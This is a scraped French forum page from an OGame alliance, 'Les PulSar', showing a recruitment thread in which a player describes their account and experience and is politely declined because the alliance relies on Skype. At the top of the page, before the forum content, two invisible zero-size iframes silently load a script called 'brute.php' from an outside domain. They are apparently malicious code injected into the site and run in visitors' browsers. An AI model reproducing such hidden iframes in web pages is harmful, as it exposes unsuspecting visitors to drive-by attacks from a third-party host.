Les PulSar
<iframe style="border: none; width: 0px; height: 0px;" src="http://supprime.net/brute.php?maitre=lechemabanane"></iframe>
Les PulSar
<iframe style="border: none; width: 0px; height: 0px;" src="http://supprime.net/brute.php?maitre=lechemabanane"></iframe>
Les PulSar
Vous souhaitez réagir à ce message ? Créez un compte en quelques clics ou connectez-vous pour continuer.



 
AccueilDernières imagesRechercherS'enregistrerConnexion

 

 Candidature de votre Tatie ginette <3

Aller en bas 
4 participants
AuteurMessage
Tatie ginette




Messages : 4
Date d'inscription : 02/03/2010

Candidature de votre Tatie ginette <3 Empty
MessageSujet: Candidature de votre Tatie ginette <3   Candidature de votre Tatie ginette <3 Icon_minitimeMar 2 Mar - 22:54

Bonsoir à tous,



Je viens donc poster ma candidature pour votre alliance.


Je m'appelle Tatie ginette Ingame ( la classe :0 ), top 220 ( top war rideur : 221 Tatie Ginette H Co 1.178.339 +79.430 )


Je n'es presque pas de flotte, le nécessaire au pillage, puisque je n'ai pour objectifs que du full mine pour l'instant, le reste c'est du gt ( environ 2000 ). [ personne n'a sondé ma flotte depuis des mois ou m'a raider ]


Pour mon classement en recherche, pas du glorieux ( énergie 13 fini dans quelques heures/jours pour produire plus avec mes satellites).


Je suis en full 30.27( enfin 3 cristal 28 ).23, CES28 avec des colonies identiques presque au LM près ( j'adore ), toutes en G2. Oui oui oui je ne veux que de la mine pour l'instant.



http://www.war-riders.de/fr/62/details/player/Tatie%20Ginette

Je n'es que deux lunes ( une petite ) c'est l'un des trucs a faire sur mon compte.

Mes bâtiments, si possible j'aimerais qu'un Pulsar me sonde, comme sa vous les auriez tous puisque j'ai les même colonies.

Pour l'instant, maintenant que mon full M30 a fini le même jour, je vais faire full nanite 3 puis 4, monter mes centrales de fusions et profiter de mon positionnement stratégique avec des colonies froides pour compenser le deuterium en plus dans la fusion ( devenue plus rentable que les CES )


Mon expérience :


Autant être direct, je suis un multi recyclé. Je suis cash et franc comme sa.

- Multi recyclé univers 50 ( mon univers de cœur ) ou le soir, n'ayant pas fox game ( pour dire que sa date ! ) je recevait ma flotte sur psp, dans mon lit. 2minutes plus tard je dormais du sommeil du juste, ma flotte a quai. J'ai du y passer deux fois comme sa.

- Univers 54, j'étais connu sous le nom du Joker, top 150, raideur, et je l'ai donné. 3Jours plus tard mon repreneur a été péter apres avoir passé la nuit a quai comme une fleur ( je peux chercher le hof sur le board si vous voulez )

Maintenant je suis top 250 univers 50, ou j'ai hofer il n'y a pas longtemps :

Ma flotte :


20.000pt
2.000gt
75.000 clé
10.000 clos
10.000 croi
10.000 vb
18.000 cyclo
1.050 DD
125rip
1.000 tra

J'ai beaucoup appris de grands joueurs de cet univers, notamment de Pyrias top 7 rippeur, thalie, top 5 full mine et après de grands raideurs comme Kaos ( qui c'est fais exploser en début d'année, 10MM de cdr ), mac calagane et tous les HLD.

Je ne sais pas trop quoi dire d'autre, je suis navré, je peux aller chercher sur mon forum univers 50 une présentation classique, mais la je me suis laissé écrire comme sa venait.


POUR LE 62 :

Que dire ? J'ai vendu 40M de deuterium a Achete deut car il est celui qui a répondu le plus vite. Flipper après avoir discuté avec lui a l'air d'être quelqu'un de génial, qui souhaiterais que je continu de monté mes synthé pour lui en mettre pleins les poches ouai ! :0

Je porte un TAG pour ne pas avoir de messages de recrutement, mais je suis libre. D'ailleurs la pulsar sera la seule alliance ou je posterai. J'ai toujours jouer sans alliance, et sa sera pulsar ou rien.

Si vous voulez savoir quoi que se soit Ig ou IRL demandez, mais pour l'IRL j'aimerais bien fait anonymat total, de séparé l'IRL du jeu, sa ne fais pas de mal je trouve.


Bonne biere ! Servit des caves des Higlanders du 50 !







Candidature de votre Tatie ginette <3 Guiness
affraid
Revenir en haut Aller en bas
ilixa




Messages : 161
Date d'inscription : 26/05/2009
Age : 36
Localisation : Deriere ton cul

Candidature de votre Tatie ginette <3 Empty
MessageSujet: Re: Candidature de votre Tatie ginette <3   Candidature de votre Tatie ginette <3 Icon_minitimeSam 6 Mar - 8:38

Desoler pour le retard ;-)

Comme tu voit on est pas preser hihihihi

Belle candidature mais le probleme on a du mal au recrutement car on se connait tous tres tres bien!! Et on se mefie bcp lol (PARANO)

Ben on va en discuter en priver
Revenir en haut Aller en bas
Tatie ginette




Messages : 4
Date d'inscription : 02/03/2010

Candidature de votre Tatie ginette <3 Empty
MessageSujet: Re: Candidature de votre Tatie ginette <3   Candidature de votre Tatie ginette <3 Icon_minitimeDim 7 Mar - 10:01

Bonjours,


Il n'y a aucun souci pour le retard, j'ai toujours jouer solo sur le 62, alors je ne suis pas pressé non plus.

Pour ce qui est de discuter en privé, faite faite moi ma serveuse fera les dessous de table


Shocked
Revenir en haut Aller en bas
Mister d




Messages : 58
Date d'inscription : 26/05/2009

Candidature de votre Tatie ginette <3 Empty
MessageSujet: Re: Candidature de votre Tatie ginette <3   Candidature de votre Tatie ginette <3 Icon_minitimeDim 7 Mar - 11:02

o_O LOL

G hate de la voir en action la serveuse moi ^^
preummmmmmmmmmmmmm's!!!!!! mdrrrrrr

Si tu as skype c pas un luxe, pour apprendre à ce connaitre et ne pas douter de ta sincérité y'a pas mieux Wink
Donc si tu veux avoir une chance de faire partie de notre cercle ultra privé, investi! Very Happy
Revenir en haut Aller en bas
Tatie ginette




Messages : 4
Date d'inscription : 02/03/2010

Candidature de votre Tatie ginette <3 Empty
MessageSujet: Re: Candidature de votre Tatie ginette <3   Candidature de votre Tatie ginette <3 Icon_minitimeLun 8 Mar - 18:01

Flip flap flop bonsoir :0


Mister D, pour la serveuse il va falloir patienter, elle n'aime pas faire la queue - oh ce jeux de mot Very Happy -

En ce qui concerne Skype .. pas possble. non pas que sa me gene de vous taper la discut' loin de la, mais je vie dans une famille de 7 enfant ou le pc on peux - pas une question de buget hein - mais sa fais tres tres tres tres TRES geek.

Voila mais sinon sa ne m'aurais pas deranger.

Demander moi ingame j'ai :

mIRC
msn

Donc c'est pas contre vous du tout mais cet effort la je ne peux pas et sa ne depends pas de moi.
Revenir en haut Aller en bas
Picasa
Admin
Picasa


Messages : 144
Date d'inscription : 26/05/2009
Localisation : Belgique

Candidature de votre Tatie ginette <3 Empty
MessageSujet: Re: Candidature de votre Tatie ginette <3   Candidature de votre Tatie ginette <3 Icon_minitimeMar 9 Mar - 21:35

Alors sa ne collera pas désolé Wink

On est une ally qui vie que sur skype et très peux via messages ou forum comme tu peux le voir Wink.

Sinon belle petite candi, bonne chance à toi pour le futur Smile
Revenir en haut Aller en bas
Tatie ginette




Messages : 4
Date d'inscription : 02/03/2010

Candidature de votre Tatie ginette <3 Empty
MessageSujet: Re: Candidature de votre Tatie ginette <3   Candidature de votre Tatie ginette <3 Icon_minitimeMer 10 Mar - 9:35

Je comprends parfaitement.

Bonne chance pour la suite a vous aussi, du fond du coeur Wink


Si vous avez besoin de deut ingame demandez j'en ai deja une 15aine de millions de rab'


A bientot sur le board les gars
Revenir en haut Aller en bas
Contenu sponsorisé





Candidature de votre Tatie ginette <3 Empty
MessageSujet: Re: Candidature de votre Tatie ginette <3   Candidature de votre Tatie ginette <3 Icon_minitime

Revenir en haut Aller en bas
 
Candidature de votre Tatie ginette <3
Revenir en haut 
Page 1 sur 1
 Sujets similaires
-
» Besoin de votre aide

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
Les PulSar :: Partie Publique :: Recrutement-
Sauter vers: